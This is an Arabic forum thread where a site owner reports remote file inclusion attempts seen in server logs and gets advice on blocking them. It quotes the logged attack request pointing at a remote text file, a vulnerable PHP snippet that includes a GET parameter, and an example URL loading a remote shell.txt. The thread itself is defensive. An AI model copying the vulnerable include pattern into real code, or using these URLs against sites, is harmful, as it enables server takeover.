لقد لاحظت بانهم يستخدمون الاكواد :
SERV REQUEST_URI=/index.php//classified_right.php?language_dir=http://usuarios.lycos.es/workink/id.txt????
http://index.php//classified_right.p...ink/id.txt????
ما العمل؟
لقد لاحظت بانهم يستخدمون الاكواد :
SERV REQUEST_URI=/index.php//classified_right.php?language_dir=http://usuarios.lycos.es/workink/id.txt????
http://index.php//classified_right.p...ink/id.txt????
ما العمل؟
__________________
موقع دبوريه - عرب 48: http://www.dabburiya.net/index.php
منتدى دبوريه - عرب 48: http://www.dabburiya.net/forums/index.php
اخوي..ثغرة.انكلود...@!!!خطيرة.الثغره.باماكانه.التحكم.بالس يرفر.كامل.حسب.خبرته
عطل.الدوال..أو..
IncludeInclude_onceRequire_onceRequire
مثال..للخطا.بالسكربت
<?php
$vuln = $_GET['rfi'];
include ($vuln);
?>
http://localhost/indexx.php?rfi=www.xx.com/shell.txt?
سكربت..النيوك.مركب.عطل.الدوال.الخطرة.بالسيرفر.
وانشاءالله.تنحل
مجرد..توضيح.فقط
كيف يمكنني تعطيل الدوال التي ذكرتها من ال cpanel ??
لانه لا يمكنني الوصول للملف php.ini
__________________
موقع دبوريه - عرب 48: http://www.dabburiya.net/index.php
منتدى دبوريه - عرب 48: http://www.dabburiya.net/forums/index.php
علي الاقل احذف اي http:// من المتغيرات
__________________
عاشت مصر حرة مستقلة
اذا.انت.على.استضافه.ماتقدررر
اذا.صاحب.السيرفر.تستطيع
اتصل بصاحب السرفر واعمله هذا
__________________
إِنْ لَمْ تُحْسِنْ ظنَّكَ بِهِ لِأَجْلِ وَصْفِهْ فَحَسِّنْ
ظَنَّكَ بِهِ لِأَجْلِ مُعَامَلَتِهِ مَعَكْ فَهَلْ عَوَّدَكَ إِلَّا حَسَنًا؟
وَهَلْ أَسْدَى إِلَيْكَ إِلَّا مِنَنًا؟
ليس شرطاً أن تعدل في الـ php.ini لسد هذه الثغرة لمنع تضمين الملفات من خارج السرفر
- افحص قيمة المتغير وتأكد من خلوه لأي كود ضار أو رابط خارجي
حل سريع في الكود المكتوب بالأعلى
- انظر في اللغة الإفتراضية التي تعتمد عليها واستخرج المسار الخاص بها
- خذ المسار وضعه داخل دالة الـ include الخاصة بتضمين ملفات اللغة.
- بهذا تكون قضيت على تعدد اللغات في موقعك واستخدمت واحدة فقط ..
وهذا حل مؤقت إن لم تأخذ بأحد الحلول السابقة.
لا تنسى أيضاً حظر IP المخترق .
__________________
اللهم وفقني لما تحبه وترضاه...